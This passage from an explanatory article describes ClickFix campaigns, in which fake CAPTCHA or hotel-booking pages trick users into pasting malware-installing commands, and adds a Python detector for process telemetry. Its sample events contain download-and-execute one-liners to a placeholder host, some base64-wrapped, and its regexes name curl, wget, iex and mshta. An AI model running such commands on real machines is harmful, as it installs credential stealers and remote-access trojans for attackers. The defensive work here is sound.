Over the past year, cybercriminals have increasingly adopted a relatively new and sophisticated technique to infect computers with malware, targeting both macOS and Windows users. This method, known as “ClickFix,” exploits users’ trust and bypasses many traditional endpoint security protections, making it a significant threat that many potential victims are still unaware of.
The ClickFix attack typically begins with a seemingly legitimate communication. Commonly, victims receive an email from a hotel where they supposedly have a pending reservation, complete with accurate registration details to lend credibility. In other cases, the initial contact comes via WhatsApp messages, or the victim might encounter a malicious site listed at the top of Google search results after performing a relevant query. These trusted sources help to lower the victim’s guard and increase the likelihood that they will follow the instructions presented on the malicious site.
Once the victim accesses the fraudulent website, they are confronted with a challenge designed to appear harmless or routine—often a CAPTCHA verification or a similar prompt. The website instructs the user to copy a string of text, open a terminal or command prompt window on their computer, paste the copied text, and press Enter. This step is critical in the attack process, as it initiates the download and installation of malware from a server controlled by the scammers.
What makes this technique particularly insidious is how seamlessly it infects the victim’s machine. After the user executes the command, the computer silently connects to the attacker’s server, downloads the malicious payload, and installs it without any clear indication that anything harmful has occurred. Most often, the malware deployed is credential-stealing software, which silently harvests sensitive information such as passwords, banking details, and personal data. Because the infection process bypasses many traditional endpoint protections, including some security mechanisms built into macOS and Windows, victims have little chance of detecting or stopping the attack once the command is entered.
Security researchers have noted the rapid growth and sophistication of ClickFix campaigns. According to a report from CrowdStrike, the method leverages “malvertising” (malicious advertising) and a “one-line installation command” to deliver malware, particularly targeting macOS users. The campaign documented by CrowdStrike involved the distribution of a Mach-O executable—a common type of binary file on macOS—designed to steal information. The attackers also used deceptive websites to drive traffic and maximize the number of victims. Crucially, the one-line command technique allows the malware to bypass macOS’s built-in Gatekeeper security checks, which normally prevent unauthorized software installation.
The primary malware deployed in this macOS campaign is known as Shamos, a credential stealer designed to quietly extract login credentials and other sensitive information. Other malicious payloads included software that turns the infected Mac into part of a botnet, a malicious cryptocurrency wallet, and configuration changes that ensure the malware remains active even after the computer restarts. These capabilities demonstrate the attackers’ intent to maintain long-term access and control over compromised systems.
Windows users are not spared from these attacks. Sekoia, another cybersecurity firm, documented a similar ClickFix campaign targeting Windows devices. Attackers first compromised hotel accounts on popular travel booking platforms like Booking.com. Using the legitimate reservation data stored in these accounts, the attackers contacted individuals with upcoming reservations, building trust by referencing accurate booking details. This strategy increases the likelihood that victims will comply with instructions out of concern for preserving their travel plans.
The malicious site used in this Windows campaign mimics a legitimate CAPTCHA challenge, closely resembling the ones deployed by Cloudflare, a widely used content delivery network. Victims are again asked to copy a piece of text and paste it into the Windows terminal to “prove” they are human. However, this command silently installs malware known as PureRAT, a remote access trojan that gives attackers control over the victim’s machine.
Further complicating detection and defense efforts, some ClickFix campaigns adapt their payloads based on the device accessing the malicious site. Push Security, another cybersecurity organization, reported on a campaign that delivers different malware depending on whether the visitor is using Windows or macOS. Many of these payloads rely on “living off the land” binaries (LOLbins)—legitimate operating system tools and utilities that attackers repurpose to carry out malicious actions. Because LOLbins use native system functionalities and avoid writing suspicious files to disk, endpoint protection software often struggles to detect their activities.
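The three elements the article has described so far, a shell the user opens and pastes into, a one-line download-and-run command, and native tools (LOLbins) doing the work, are also what a defender can look for in process-creation telemetry. The script below is an added illustration written for this page, not tooling from CrowdStrike, Sekoia or Push Security; the event schema, the `SAMPLE_EVENTS` list and the `placeholder.invalid` host are constructed for the example. It scores each shell launch on whether the command line carries a download-and-execute idiom, whether it is wrapped in base64 (PowerShell `-EncodedCommand` or a POSIX `base64 -d` pipeline, which it unwraps before matching), and whether the shell's parent is an interactive launcher such as Explorer's Run dialog or a terminal app.

```python
"""Flag ClickFix-style paste-to-terminal executions in process telemetry.

Added example for this article; not the code of any vendor named here.
Assumed: an EDR-like record with parent image, image and command line.
"""
import base64
import re
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class ProcessEvent:
    parent: str    # image that spawned the shell (assumed field)
    image: str     # the shell/LOLbin that was launched
    cmdline: str   # full command line as recorded


# Where a pasted ClickFix one-liner lands: a user-driven prompt or terminal.
USER_LAUNCHERS = {"explorer.exe", "windowsterminal.exe", "cmd.exe", "terminal", "iterm2"}
# Interpreters and LOLbins that turn pasted text into code.
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "bash", "zsh", "sh"}

# Download-then-execute idioms typical of one-line installers.
DOWNLOAD_EXEC = re.compile(
    r"(invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b|downloadstring|"
    r"invoke-expression|\biex\b|\|\s*(?:ba)?sh\b|\bmshta\b\s+https?://)",
    re.IGNORECASE,
)
# PowerShell -e/-enc/-EncodedCommand (base64 of UTF-16LE text).
PS_ENCODED = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
# POSIX "echo <b64> | base64 -d" pipelines (macOS accepts -D, hence IGNORECASE).
B64_PIPE = re.compile(r"([A-Za-z0-9+/=]{16,})\s*\|\s*base64\s+(?:-d|--decode)", re.IGNORECASE)


def decode_wrapped(cmdline: str) -> str:
    """Return the base64-unwrapped inner command, or '' if there is none."""
    m = PS_ENCODED.search(cmdline)
    if m:
        try:
            return base64.b64decode(m.group(1)).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            return ""
    m = B64_PIPE.search(cmdline)
    if m:
        try:
            return base64.b64decode(m.group(1)).decode("utf-8", "replace")
        except ValueError:
            return ""
    return ""


def analyze(ev: ProcessEvent) -> Tuple[int, List[str]]:
    """Score one event: one point per ClickFix indicator, with the reasons."""
    reasons: List[str] = []
    parent, image = ev.parent.lower(), ev.image.lower()
    if image not in SHELLS:
        return 0, reasons
    inner = decode_wrapped(ev.cmdline)
    if inner:
        reasons.append("base64-wrapped command: " + inner.strip())
    # Match on the visible line and on the unwrapped text together.
    if DOWNLOAD_EXEC.search(ev.cmdline + "\n" + inner):
        reasons.append("download-and-execute idiom")
    if parent in USER_LAUNCHERS:
        reasons.append("shell started interactively from " + parent)
    return len(reasons), reasons


ALERT_THRESHOLD = 2  # a download idiom alone (e.g. a build script) does not alert


def scan(events: List[ProcessEvent]) -> List[Tuple[int, List[str]]]:
    """Return (index, reasons) for every event at or above the alert threshold."""
    hits = []
    for i, ev in enumerate(events):
        score, reasons = analyze(ev)
        if score >= ALERT_THRESHOLD:
            hits.append((i, reasons))
    return hits


def _ps_encode(script: str) -> str:
    return base64.b64encode(script.encode("utf-16-le")).decode()


def _b64(text: str) -> str:
    return base64.b64encode(text.encode()).decode()


# Constructed sample telemetry; placeholder.invalid is a reserved, unreachable name.
SAMPLE_EVENTS = [
    ProcessEvent("explorer.exe", "powershell.exe",
                 "powershell.exe -w hidden -enc "
                 + _ps_encode("iwr https://placeholder.invalid/v | iex")),
    ProcessEvent("Terminal", "bash",
                 'bash -c "echo ' + _b64("curl -fsSL https://placeholder.invalid/i | bash")
                 + ' | base64 -d | bash"'),
    ProcessEvent("explorer.exe", "powershell.exe",
                 "powershell.exe -NoProfile -Command Get-Process"),   # benign admin use
    ProcessEvent("make", "sh",
                 "sh -c 'curl -fsSL https://placeholder.invalid/setup.sh | sh'"),  # build script
]

if __name__ == "__main__":
    for idx, why in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {SAMPLE_EVENTS[idx].cmdline[:60]}...")
        for r in why:
            print("   -", r)
```

On the constructed samples only the first two events alert: the encoded PowerShell launched from Explorer and the `base64 -d | bash` pipeline launched from Terminal. The benign `Get-Process` from Explorer and the `curl | sh` inside a `make` run each score one point, which is the intended design: the parent-process condition is what separates a user pasting something from a website into a prompt from a developer's build script, and unwrapping the base64 is what keeps encoding from hiding the download idiom. In a real deployment the launcher and shell sets would be tuned to the fleet, and the decoded inner command would be kept with the alert for triage.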
The commands victims are instructed to execute are frequently encoded in base-64 to make them unreadable at a
